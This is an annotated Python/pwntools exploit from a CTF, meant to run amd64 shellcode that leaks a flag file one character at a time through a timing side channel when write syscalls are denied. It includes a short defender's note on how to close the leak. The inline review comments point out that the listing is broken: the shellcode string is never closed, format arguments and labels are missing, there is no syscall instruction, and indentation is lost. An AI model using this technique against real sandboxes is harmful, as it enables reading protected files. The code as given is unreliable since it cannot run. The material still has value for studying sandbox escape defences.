Assembly/Python blind file reader; useful when the write syscall is not allowed.
#!/usr/bin/env python
# Blind (no-output) file reader, CTF style: recovers a file's bytes one
# printable character at a time by *timing* a small amd64 stub rather than
# having the stub write anything back.  As far as the pasted lines show, the
# stub pushes the 8-byte path ".///flag" onto the stack, sets up an open(2)
# call (syscall number 2 in al), compares one byte of the buffer at rsp+8
# with a candidate character, and then either branches to `exit` or spins a
# counter up to 0x7fffffff in a `delay` loop.  The wall-clock time of
# run_assembly() is the channel: more than 0.5 s means the guess matched.
#
# NOTE(review): the listing is incomplete as pasted.  The triple-quoted
# string opened at `shellcode = '''` is never closed, the `%s` placeholders
# are never substituted (no `% (...)` follows), the `exit` and `delay` labels
# used by `jnz`/`jb` are not defined, and no `syscall` instruction appears
# between the register-setup lines (`mov rdi, rax` right after `mov al, 2`
# only makes sense once a syscall has turned rax into a file descriptor).
# Indentation was also lost, so the nesting of the while/for/if bodies is
# inferred, not verified.  Read the Python below as indicative, not runnable.
#
# Defender's note: a sandbox that only denies output syscalls still leaks
# file contents through timing (or exit status); restricting open/openat and
# filesystem visibility, and bounding execution time, is what closes this.
from pwn import *
import string
import time
context.log_level = 'error'   # silence pwntools' per-run output; only our prints remain
u = make_unpacker(64, endian='little', sign='unsigned')   # 8-byte little-endian unpacker
filename = hex(u('.///flag'))   # the 8-byte path as one immediate for `mov rdi, <imm>`
flag = ""       # characters recovered so far
pos = -1        # offset bookkeeping for the byte being probed; starts at -1 and is
                # bumped on each hit, so presumably pos+1 is what gets substituted -- the
                # format arguments are not visible, so this cannot be confirmed
lastchar = 0    # guesses since the last hit; a full pass with no hit ends the outer loop
while (lastchar < len(string.printable)):
for i in string.printable:
start = time.time()
shellcode = '''
xor rax, rax
xor rdi, rdi
push rdi
mov rdi, %s
push rdi
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
mov al, 2
mov rdi, rax
lea rsi, [rsp+8]
or rdx, 0xf
xor rax, rax
xor rdx, rdx
mov rdx, %s
mov al, byte [rsi+%s]
cmp rax, rdx
jnz exit
xor r11, r11
mov r11, 0
inc r11
cmp r11, 0x7fffffff
jb delay
xor rdi, rdi
mov al, 60
lastchar += 1   # NOTE(review): lexically still inside the unterminated string above
p = run_assembly(shellcode, arch="amd64")   # assemble + execute the stub; its runtime is the signal
end = time.time()
if ((end - start) > 0.5):   # the delay loop ran, i.e. the probed byte equalled candidate i
pos += 1
lastchar = 0                # reset the miss counter so the outer loop keeps going
print "Found: %s"%i
flag = "%s%s"%(flag,i)
print "[*] String: %s"%flag